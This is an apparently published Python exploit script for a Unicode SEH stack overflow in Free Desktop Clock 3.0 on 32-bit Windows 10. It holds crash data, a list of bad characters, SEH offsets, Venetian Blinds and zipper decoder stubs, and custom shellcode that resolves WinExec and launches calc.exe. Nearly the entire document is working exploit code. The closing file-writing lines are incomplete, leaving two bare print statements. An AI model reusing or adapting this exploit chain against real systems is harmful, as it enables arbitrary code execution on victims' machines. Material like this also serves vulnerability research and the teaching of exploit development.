# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
# Exploit Author: Bobby Cooke
# Date: 2020-04-11
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/freeclock.exe
# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86)
# - Does not work on x64 version
# Version: Free Desktop Clock 3.0
# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer
############################### CRASH INFO ###############################
# [!] Access violation
# 042D15E78908 mov [eax], ecx; FreeDesk.00440044
# SEH chain of main thread
# AddressSE handler
# 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite
# 00410041 74737953
# 69620C00 *** CORRUPT ENTRY ***
############################### CRASH INFO ###############################
File= 'poc.txt'
######################### EXPLOIT ENVIRONMENT INFO #########################
#badChars= '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e'
#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f'
#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f)
# Base | Rebase | SafeSEH | ASLR| NXCompat | Modulename
# 0x00400000 | False| False | False |False | [FreeDesktopClock.exe]
# 0x042b0000 | True | False | False |False | [Clock.dll]
######################### EXPLOIT ENVIRONMENT INFO #########################
os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite
nSEH= '\xeb\x05' # jmp short +2
SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe]
# nSEH & SEH translated opcodes after Pop-Pop-Ret
# EB 00 jmp short +2
# 05 00EB0043 add eax, 4300EB00
# GetPC to decode our decoder using Venetian Blinds technique
getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory
getPC+= '\x61' # popad # [ESP] = &Payload
getPC+= '\x72' # add [edx], dh # realigns execution for 1 byte opcodes
ebx2eax= '\x58'# pop eax # EAX = &Payload
ebx2eax += '\x72'# add [edx], dh
# Use Venetian Blinds technique to fix our mangled decoder
# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte.
# Ajust EAX to &Decoder
getDecoder= '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += '\x72' # add [edx], dh
getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += '\x72' # add [edx], dh
getDecoder += '\x50' # push eax# [ESP] = &Decoder
getDecoder += '\x72' # add [edx], dh
############################# ZIPPER DECODER ###############################
# Set EAX = First non-null byte of shellcode
# init:
# 1 | 50|push eax # EAX = &Shellcode
# 2 | 5F|pop edi# EDI = Decoder Destination Base Address
# 3 | 47|inc edi# First 0x00 byte of shellcode
# 4:5 | 33D2|xor edx, edx
# 6:7 | 33C9|xor ecx, ecx
# 8:11| 66:B9 1004|mov cx, 410# ECX = Loop Counter
# decodeLoop:
# 12:13 | 33DB|xor ebx, ebx
# 14| 42|inc edx # EDX+EAX = &SourceShellcodeByte
# 15| 42|inc edx # increment to next non-null byte
# 16:17 | 32DB|xor bl, bl# clear BL to hold next shellcode byte
# 18:20 | 021C10|add bl, [eax+edx] # BL = SourceShellcodeByte
# 21:22 | 203F|and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00
# 23:24 | 301F|xor [edi], bl # Write next byte of shellcode
# 25| 47|inc edi
# 26| 49|dec ecx
# 27:28 | 74 02 |je short jmp2code
# 29:30 | ^ EB ED |jmp short decodeLoop
# jmp2code:
# 31| 50|push eax
# 32| C3|ret
#DecoderHex= '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3'
# 2468 10 12 14 16 18 20 22 24 26 28 30 32
# Note: These nop unicode instructions are actually [reg+0x00] not [reg]
# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes
# Use the 3 byte version for Venetian Blinds alignment
# Example:
#nasm > add [edx], dh
# 000000000032add [edx],dh
# nasm > add [edx+00], dh
# 000000000032add [edx],dh
# nasm > add [edx+01], dh
# 00000000007201add [edx+0x1],dh
# + This happens when typing in ASM commands into msf-nasm_shell and immunity
## 2nd byte - \x00 => \x5F
venBlinds = '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\xC6\x5F' # mov byte [eax], 0x50
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 4th byte - \x00 => \x33
venBlinds+= '\xC6\x33' # mov byte [eax], 0x33
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 6th byte - \x00 => \x33
venBlinds+= '\xC6\x33' # mov byte [eax], 0x33
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 8th byte - \x00 => \x66
venBlinds+= '\xC6\x66' # mov byte [eax], 0x66
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 10th byte - \x00 => \x10
venBlinds+= '\xC6\x10' # mov byte [eax], 0x10
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 12th byte - \x00 => \x33
venBlinds+= '\xC6\x33' # mov byte [eax], 0x33
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 14th byte - \x00 => \x42
venBlinds+= '\xC6\x42' # mov byte [eax], 0x42
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 16th byte - \x00 => \x32
venBlinds+= '\xC6\x32' # mov byte [eax], 0x32
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 18th byte - \x00 => \x02
venBlinds+= '\xC6\x02' # mov byte [eax], 0x02
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 20th byte - \x00 => \x10
venBlinds+= '\xC6\x10' # mov byte [eax], 0x10
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 22nd byte - \x00 => \x3F
venBlinds+= '\xC6\x3F' # mov byte [eax], 0x3F
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 24nd byte - \x00 => \x1F
venBlinds+= '\xC6\x1F' # mov byte [eax], 0x1F
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 26th byte - \x00 => \x49
venBlinds+= '\xC6\x49' # mov byte [eax], 0x49
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 28th byte - \x00 => \x02
venBlinds+= '\xC6\x02' # mov byte [eax], 0x02
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 30th byte - \x00 => \xED
venBlinds+= '\xC6\xED' # mov byte [eax], 0xED
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
venBlinds+= '\x40' # inc eax // now eax points to the next '\x00'
venBlinds+= '\x72' # add [edx], dh // nop to realign opcode execution
## 32nd byte - \x00 => \xC3
venBlinds+= '\xC6\xC3' # mov byte [eax], 0xC3
venBlinds+= '\x72' # add [edx], dh
venBlinds+= '\x40' # inc eax// now eax points shellcode byte
venBlinds+= '\x72' # add [edx], dh
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds+= '\xC3' # ret[!] Now we are executing the decoder!
os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))
#badChars= 00 0d 80 82->8e 91->9f
# Custom PopCalc shellcode that avoids the bad characters
fKernel32= '\x33\xF6' # xor esi, esi
fKernel32 += '\xF7\xE6' # mul esi
fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB
fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR
fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C]# ESI =1st entry in InitOrderModuleList / ntdll.dll
fKernel32 += '\xAD' # lodsd# EAX = 2nd entry in InitOrderModuleList / kernelbase.dll
fKernel32 += '\x50' # push eax
fKernel32 += '\x5E' # pop esi
fKernel32 += '\xAD' # lodsd# EAX = 3rd entry in InitOrderModuleList / kernel32.dll
fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32
gExpotTbl= '\x33\xC9' # xor ecx, ecx
gExpotTbl += '\x33\xF6' # xor esi, esi
gExpotTbl += '\x33\xDB' # xor ebx, ebx
gExpotTbl += '\xF7\xE3' # mul ebx
gExpotTbl += '\x58' # pop eax#EAX= &kernel32
gExpotTbl += '\x50' # push eax # [ESP] = &kernel32
gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader
gExpotTbl += '\x03\xF0' # add esi, eax; ESI = &NewEXEHeader
gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable
gExpotTbl += '\x03\xD0' # add edx, eax; EDX = &ExportTable = 763477B0
gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable
gExpotTbl += '\x03\xD8' # add ebx, eax; EBX = &ExportNameTable
gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable
gExpotTbl += '\x03\xC8' # add ecx, eax; ECX = &ExportOrdinalTable
gExpotTbl += '\x51' # push ecx
gExpotTbl += '\x33\xFF' # xor edi, edi
gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable
gExpotTbl += '\x03\xF8' # add edi, eax; EDI = &ExportAddrTable
gExpotTbl += '\x57' # push edi
fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW
fWinExec+= '\x33\xC0' # xor eax, eax; EAX = Counter
fWinExec+= '\x33\xF6' # xor esi, esi
fWinExec+= '\x03\xF4' # add esi, esp; ESI = "WinE"
fWinExec+= '\xFC' # cld ; Process strings left to right
fWinExec+= '\x50' # push eax
fWinExec+= '\x33\xC9' # xor ecx, ecx
fWinExec+= '\x41' # inc ecx
fWinExec+= '\x41' # inc ecx
fWinExec+= '\x41' # inc ecx
fWinExec+= '\x41' # inc ecx
fWinExec+= '\xF7\xE1' # mul ecx
fWinExec+= '\x33\xFF' # xor edi, edi
fWinExec+= '\x03\x3C\x18' # add edi, [eax+ebx]
fWinExec+= '\x58' # pop eax
fWinExec+= '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString
fWinExec+= '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec"
fWinExec+= '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop
fWinExec+= '\x40' # inc eax; Counter ++
fWinExec+= '\xEB\xE1' # jmp short searchLoop ; restart loop
fWinExec+= '\x33\xC9' # xor ecx, ecx
fWinExec+= '\x41' # inc ecx
fWinExec+= '\x41' # inc ecx
fWinExec+= '\xF7\xE1' # mul ecx
fWinExec+= '\x33\xC9' # xor ecx, ecx
fWinExec+= '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable
fWinExec+= '\x03\xC8' # add ecx, eax
fWinExec+= '\x33\xC0' # xor eax, eax
fWinExec+= '\x66\x03\x01' # add ax, [ecx];AX = ordinalNumber
fWinExec+= '\x33\xC9' # xor ecx, ecx
fWinExec+= '\x41\x41\x41\x41' # inc ecx X 4
fWinExec+= '\xF7\xE1' # mul ecx
fWinExec+= '\xFF\x74\x24\x04' # push dword [esp+0x4]
fWinExec+= '\x01\x04\x24' # add [esp], eax
fWinExec+= '\x5A' # pop edx
fWinExec+= '\x33\xDB' # xor ebx, ebx
fWinExec+= '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec
fWinExec+= '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec
# Call WinExec( CmdLine, ShowState );
# CmdLine = "calc.exe"
# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec= '\x33\xC9' # xor ecx, ecx; clear eax register
callWinExec += '\x51' # push ecx; string terminator 0x00 for "calc.exe" string
callWinExec += '\x68\x2E\x65\x78\x65' # push 0x6578652e ; exe. : 6578652e
callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163
callWinExec += '\x33\xC0' # xor eax, eax
callWinExec += '\x03\xC4' # add eax, esp; save pointer to "calc.exe" string in eax
callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001
callWinExec += '\x51' # push ecx; uCmdShow- push 0x1 to stack # 2nd argument
callWinExec += '\x50' # push eax; lpcmdLine - push string address stack # 1st argument
callWinExec += '\xFF\xD3' # call ebx; Call the WinExec Function
shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec
buffer= os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler= '\x77'*(9000-len(buffer))
buffer= buffer+filler
payload = buffer
f = open(File, 'w')
print File + " created successfully"
print File + ' failed to create'